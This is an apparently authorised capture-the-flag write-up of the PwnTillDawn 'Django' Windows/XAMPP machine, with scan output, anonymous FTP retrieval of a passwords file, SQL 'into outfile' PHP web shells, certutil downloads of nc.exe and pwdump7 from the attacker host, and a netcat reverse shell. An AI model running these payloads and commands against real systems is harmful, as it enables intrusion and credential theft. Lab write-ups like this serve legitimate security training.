1st we start with a nmap scan
E:\PENTEST\NMAP>nmap -vv -A 10.150.150.212 WARNING: Could not import all necessary Npcap functions. You may need to upgrade to the latest version from http://www.npcap.org. Resorting to connect() mode -- Nmap may not function completely Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-20 13:18 W. Europe Summer Time NSE: Loaded 148 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 13:18 Completed NSE at 13:18, 0.00s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 13:18 Completed NSE at 13:18, 0.00s elapsed Initiating Ping Scan at 13:18 Scanning 10.150.150.212 [2 ports] Completed Ping Scan at 13:18, 0.03s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 13:18 Completed Parallel DNS resolution of 1 host. at 13:18, 0.01s elapsed Initiating Connect Scan at 13:18 Scanning 10.150.150.212 [1000 ports] Discovered open port 443/tcp on 10.150.150.212 Discovered open port 3306/tcp on 10.150.150.212 Discovered open port 21/tcp on 10.150.150.212 Discovered open port 139/tcp on 10.150.150.212 Discovered open port 80/tcp on 10.150.150.212 Discovered open port 445/tcp on 10.150.150.212 Discovered open port 135/tcp on 10.150.150.212 Discovered open port 49157/tcp on 10.150.150.212 Discovered open port 49152/tcp on 10.150.150.212 Discovered open port 49158/tcp on 10.150.150.212 Discovered open port 49154/tcp on 10.150.150.212 Discovered open port 8089/tcp on 10.150.150.212 Discovered open port 49153/tcp on 10.150.150.212 Discovered open port 49155/tcp on 10.150.150.212 Completed Connect Scan at 13:19, 44.10s elapsed (1000 total ports) Initiating Service scan at 13:19 Scanning 14 services on 10.150.150.212 Service scan Timing: About 64.29% done; ETC: 13:20 (0:00:30 remaining) Completed Service scan at 13:20, 59.02s elapsed (14 services on 1 host) NSE: Script scanning 10.150.150.212. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 13:20 NSE Timing: About 99.95% done; ETC: 13:20 (0:00:00 remaining) Completed NSE at 13:20, 38.83s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 13:20 Completed NSE at 13:20, 0.00s elapsed Nmap scan report for 10.150.150.212 Host is up, received syn-ack (0.032s latency). Scanned at 2020-08-20 13:18:29 W. Europe Summer Time for 144s Not shown: 986 filtered ports Reason: 986 no-responses PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack | fingerprint-strings: | GenericLines: | 220-Wellcome to Home Ftp Server! | Server ready. | command not understood. | command not understood. | Help: | 220-Wellcome to Home Ftp Server! | Server ready. | 'HELP': command not understood. | NULL, SMBProgNeg: | 220-Wellcome to Home Ftp Server! | Server ready. | SSLSessionReq: | 220-Wellcome to Home Ftp Server! | Server ready. |_ command not understood. | ftp-anon: Anonymous FTP login allowed (FTP code 230) | drw-rw-rw- 1 ftp ftp 0 Mar 26 2019 . [NSE: writeable] | drw-rw-rw- 1 ftp ftp 0 Mar 26 2019 .. [NSE: writeable] | drw-rw-rw- 1 ftp ftp 0 Mar 13 2019 FLAG [NSE: writeable] | -rw-rw-rw- 1 ftp ftp 34419 Mar 26 2019 xampp-control.log [NSE: writeable] |_-rw-rw-rw- 1 ftp ftp 881 Nov 13 2018 zen.txt [NSE: writeable] | ftp-syst: |_ SYST: Internet Component Suite 80/tcp open http syn-ack Apache httpd 2.4.34 ((Win32) OpenSSL/1.0.2o PHP/5.6.38) |_http-favicon: Unknown favicon MD5: 56F7C04657931F2D0B79371B2D6E9820 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38 | http-title: Welcome to XAMPP |_Requested resource was http://10.150.150.212/dashboard/ 135/tcp open msrpc syn-ack Microsoft Windows RPC 139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn 443/tcp open ssl/http syn-ack Apache httpd 2.4.34 ((Win32) OpenSSL/1.0.2o PHP/5.6.38) |_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38 | http-title: Welcome to XAMPP |_Requested resource was https://10.150.150.212/dashboard/ | ssl-cert: Subject: commonName=localhost | Issuer: commonName=localhost | Public Key type: rsa | Public Key bits: 1024 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2009-11-10T23:48:47 | Not valid after: 2019-11-08T23:48:47 | MD5: a0a4 4cc9 9e84 b26f 9e63 9f9e d229 dee0 | SHA-1: b023 8c54 7a90 5bfa 119c 4e8b acca eacf 3649 1ff6 | -----BEGIN CERTIFICATE----- | MIIBnzCCAQgCCQC1x1LJh4G1AzANBgkqhkiG9w0BAQUFADAUMRIwEAYDVQQDEwls | b2NhbGhvc3QwHhcNMDkxMTEwMjM0ODQ3WhcNMTkxMTA4MjM0ODQ3WjAUMRIwEAYD | VQQDEwlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMEl0yfj | 7K0Ng2pt51+adRAj4pCdoGOVjx1BmljVnGOMW3OGkHnMw9ajibh1vB6UfHxu463o | J1wLxgxq+Q8y/rPEehAjBCspKNSq+bMvZhD4p8HNYMRrKFfjZzv3ns1IItw46kgT | gDpAl1cMRzVGPXFimu5TnWMOZ3ooyaQ0/xntAgMBAAEwDQYJKoZIhvcNAQEFBQAD | gYEAavHzSWz5umhfb/MnBMa5DL2VNzS+9whmmpsDGEG+uR0kM1W2GQIdVHHJTyFd | aHXzgVJBQcWTwhp84nvHSiQTDBSaT6cQNQpvag/TaED/SEQpm0VqDFwpfFYuufBL | vVNbLkKxbK2XwUvu0RxoLdBMC/89HqrZ0ppiONuQ+X2MtxE= |_-----END CERTIFICATE----- |_ssl-date: TLS randomness does not represent time | tls-alpn: | http/1.1 |_ http/1.1 445/tcp open microsoft-ds syn-ack Windows 7 Home Basic 7601 Service Pack 1 microsoft-ds (workgroup: PWNTILLDAWN) 3306/tcp open mysql syn-ack MariaDB (unauthorized) 8089/tcp open ssl/http syn-ack Splunkd httpd | http-methods: |_ Supported Methods: GET HEAD OPTIONS | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Splunkd |_http-title: splunkd | ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser | Issuer: commonName=SplunkCommonCA/organizationName=Splunk/stateOrProvinceName=CA/countryName=US/emailAddress=support@splunk.com/localityName=San Francisco | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2019-10-29T14:31:26 | Not valid after: 2022-10-28T14:31:26 | MD5: 5d60 c8e6 37f3 eea2 1ca0 3cd3 bbae 8193 | SHA-1: 0c85 65c6 0e58 49e7 1882 b403 40f4 b521 6360 8ba9 | -----BEGIN CERTIFICATE----- | MIIDMjCCAhoCCQDsGSJfSRwcdzANBgkqhkiG9w0BAQsFADB/MQswCQYDVQQGEwJV | UzELMAkGA1UECAwCQ0ExFjAUBgNVBAcMDVNhbiBGcmFuY2lzY28xDzANBgNVBAoM | BlNwbHVuazEXMBUGA1UEAwwOU3BsdW5rQ29tbW9uQ0ExITAfBgkqhkiG9w0BCQEW | EnN1cHBvcnRAc3BsdW5rLmNvbTAeFw0xOTEwMjkxNDMxMjZaFw0yMjEwMjgxNDMx | MjZaMDcxIDAeBgNVBAMMF1NwbHVua1NlcnZlckRlZmF1bHRDZXJ0MRMwEQYDVQQK | DApTcGx1bmtVc2VyMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwA4l | dCLRsUH/gqdstF7FgaM1VmhZb0ijlpG1sbpT8nG+OcPpI/LmQzMI73MceLrr3iGK | TKBmT/7HiyLjVAUOC+sRxTr0NSUOESpmEm3HA60rV7xzCiGQIJcNoVWvR7gIF5gU | 8G/Oqv2WBSJKVSg3z9up1FFYGF8VnEBUe/PyqGc0+mf0PC+vidx1V02PzeGfgG5o | dnwCD0uaQ7yzH0GT9z59N8fYfXMcVM7pbdhUIATgF0tIkl9UgwF5RSsG4wMRmzqH | /z+vjkn+hJdWydu33pD2J2st4a+v0vEDHqJYZkSXG7BqqMjsGpcjKnRsBen/JHxv | FWlo45YUTNlqtP/+fwIDAQABMA0GCSqGSIb3DQEBCwUAA4IBAQA6nFTapGzsDIHj | E38SOLEvQ5CWDWn+r1acCOTJ2U6gUzkymRhFfEZ9Sra8JK2F2a1IWcLrdbf495NN | mwpwSU1D17DchCOIRxLFm8kq3imqLX0i/zgE3C+bsbl0MbgsTZsuZIRNEBSicfx6 | ZQPIuXl8HhFiJxGxK6/cQHs0R/GsaHCiB96QEyzRZzl9OieHwAI+JdAu/QDep7Av | Z4bnpn9zJQhWIqAx6Zf7a2hLZbtNFqaFOH3sdlkI1r4vDunvIOfXXts2qq9PmitD | C0xrGPL0+gkiEIdN5+6csG2RSnfwXO3K+ZA1ABXuLshoNVNoKve6kSCwzRBwUefX | HkRDQlSM |_-----END CERTIFICATE----- 49152/tcp open msrpc syn-ack Microsoft Windows RPC 49153/tcp open msrpc syn-ack Microsoft Windows RPC 49154/tcp open msrpc syn-ack Microsoft Windows RPC 49155/tcp open msrpc syn-ack Microsoft Windows RPC 49157/tcp open msrpc syn-ack Microsoft Windows RPC 49158/tcp open msrpc syn-ack Microsoft Windows RPC 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port21-TCP:V=7.70%I=7%D=8/20%Time=5F3E5C39%P=i686-pc-windows-windows%r( SF:NULL,35,"220-Wellcome\x20to\x20Home\x20Ftp\x20Server!\r\n220\x20Server\ SF:x20ready\.\r\n")%r(GenericLines,79,"220-Wellcome\x20to\x20Home\x20Ftp\x SF:20Server!\r\n220\x20Server\x20ready\.\r\n500\x20'\r':\x20command\x20not SF:\x20understood\.\r\n500\x20'\r':\x20command\x20not\x20understood\.\r\n" SF:)%r(Help,5A,"220-Wellcome\x20to\x20Home\x20Ftp\x20Server!\r\n220\x20Ser SF:ver\x20ready\.\r\n500\x20'HELP':\x20command\x20not\x20understood\.\r\n" SF:)%r(SSLSessionReq,89,"220-Wellcome\x20to\x20Home\x20Ftp\x20Server!\r\n2 SF:20\x20Server\x20ready\.\r\n500\x20'\x16\x03\0\0S\x01\0\0O\x03\0\?G\xd7\ SF:xf7\xba,\xee\xea\xb2`~\xf3\0\xfd\x82{\xb9\xd5\x96\xc8w\x9b\xe6\xc4\xdb< SF:=\xdbo\xef\x10n\0\0\(\0\x16\0\x13\0':\x20command\x20not\x20understood\. SF:\r\n")%r(SMBProgNeg,35,"220-Wellcome\x20to\x20Home\x20Ftp\x20Server!\r\ SF:n220\x20Server\x20ready\.\r\n"); Service Info: Hosts: Wellcome, DJANGO; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 56m57s, deviation: 1s, median: 56m56s | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 18317/tcp): CLEAN (Timeout) | Check 2 (port 19575/tcp): CLEAN (Timeout) | Check 3 (port 8595/udp): CLEAN (Timeout) | Check 4 (port 51927/udp): CLEAN (Timeout) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked | smb-os-discovery: | OS: Windows 7 Home Basic 7601 Service Pack 1 (Windows 7 Home Basic 6.1) | OS CPE: cpe:/o:microsoft:windows_7::sp1 | Computer name: Django | NetBIOS computer name: DJANGO\x00 | Workgroup: PWNTILLDAWN\x00 |_ System time: 2020-08-20T12:17:14+00:00 | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-08-20 14:17:18 |_ start_date: 2020-04-02 16:41:43 NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 2) scan. Initiating NSE at 13:20 Completed NSE at 13:20, 0.00s elapsed NSE: Starting runlevel 2 (of 2) scan. Initiating NSE at 13:20 Completed NSE at 13:20, 0.00s elapsed Read data files from: E:\PENTEST\NMAP Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 147.40 seconds E:\PENTEST\NMAP>
.
kali@kali:~/ptd$ gobuster dir -k --wordlist /usr/share/wordlists/dirb/big.txt --url https://10.150.150.212 =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: https://10.150.150.212 [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/08/20 07:38:08 Starting gobuster =============================================================== /.htaccess (Status: 403) /.htpasswd (Status: 403) /aux (Status: 403) /cgi-bin/ (Status: 403) /com1 (Status: 403) /com2 (Status: 403) /com3 (Status: 403) /com4 (Status: 403) /con (Status: 403) /dashboard (Status: 301) /favicon.ico (Status: 200) /img (Status: 301) /licenses (Status: 403) /lpt1 (Status: 403) /lpt2 (Status: 403) /nul (Status: 403) /phpmyadmin (Status: 301) /prn (Status: 403) /secci (Status: 403) /server-info (Status: 403) /server-status (Status: 403) /webalizer (Status: 403) /xampp (Status: 301) =============================================================== 2020/08/20 07:40:25 Finished =============================================================== kali@kali:~/ptd$
kali@kali:~/ptd$ mysql -u root -p 10.150.150.212 Enter password:thebarrierbetween ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2) -> to test from kali2do
kali@kali:~/ptd$ nmap --script smb-vuln-* 10.150.150.212 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-20 08:18 EDT
E:\PENTEST\PTD>type xampp-control.log | findstr pass
3:11:25 PM [main] XAMPP Password Written in: “c:\xampp\passwords.txt”
E:\PENTEST\PTD>ftp 10.150.150.212
Connected to 10.150.150.212.
220-Wellcome to Home Ftp Server!
220 Server ready.
530 Please login with USER and PASS.
User (10.150.150.212:(none)): anonymous
331 Password required for anonymous.
Password:
230 User Anonymous logged in.
ftp> get ../xampp/passwords.txt
200 Port command successful.
150 Opening data connection for ../xampp/passwords.txt.
226 File sent ok
ftp: 816 bytes received in 0.16Seconds 5.07Kbytes/sec.
ftp> quit
221 Goodbye.
E:\PENTEST\PTD>type passwords.txt
### XAMPP Default Passwords ###
1) MySQL (phpMyAdmin):
User: root
Password:thebarrierbetween
2) FileZilla FTP:
[ You have to create a new user on the FileZilla Interface ]
3) Mercury (not in the USB & lite version):
Postmaster: Postmaster (postmaster@localhost)
Administrator: Admin (admin@localhost)
User: newuser
Password: wampp
4) WEBDAV:
User: xampp-dav-unsecure
Password: ppmax2011
Attention: WEBDAV is not active since XAMPP Version 1.7.4.
For activation please comment out the httpd-dav.conf and
following modules in the httpd.conf
LoadModule dav_module modules/mod_dav.so
LoadModule dav_fs_module modules/mod_dav_fs.so
Please do not forget to refresh the WEBDAV authentification (users and passwords).
E:\PENTEST\PTD>
U don’t need password. From phpmyadmin, use sql command to outfile a reverse shell
in database = flag18_ad1357d394eba91febe5a6d33dd3ec6dd0abc056
mysql> select “<?php eval($_POST[‘puckie’])?>” into outfile’C:/xampp/webshell.php’;
Query OK, 1 row affected (0.00 sec)
SELECT "<?php system($_GET['cmd']); ?>" into outfile "C:\\xampp\\htdocs\\backdoor.php"
http://10.150.150.212/backdoor.php?cmd=whoami http://10.150.150.212/backdoor.php?cmd=dir%20c:\users\chuck.norris\desktop flag11 = 7a763d39f68ece1edd1037074ff8d129451af0b1
http://10.150.150.212/backdoor.php?cmd=mkdir /temp http://10.150.150.212/backdoor.php?cmd=certutil -urlcache -split -f "http://10.66.66.94/nc.exe" c:\\temp\nc.exe http://10.150.150.212/backdoor.php?cmd=c:\\temp\nc.exe 10.66.66.94 53 -e cmd.exe
E:\PENTEST>nc -nlvp 53 listening on [any] 53 ... connect to [10.66.66.94] from (UNKNOWN) [10.150.150.212] 49269 Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\xampp\htdocs>whoami whoami django\chuck.norris c:\Users\chuck.norris\Desktop>type flag11.txt type flag11.txt 7a763d39f68ece1edd1037074ff8d129451af0b1 c:\xampp>type flag20.txt type flag20.txt a9435c140b6667cf2f24fcf6a9a1ea6b8574c3e7
certutil -urlcache -split -f “http://10.66.66.94/pwdump7.exe” c:\\temp\pwdump7.exe
Write-ups have been authorized for this machine by the PwnTillDawn Crew! We are just asking you to give us credit by adding a backlink to https://www.wizlynxgroup.com/ and https://online.pwntilldawn.com/ in your write-up.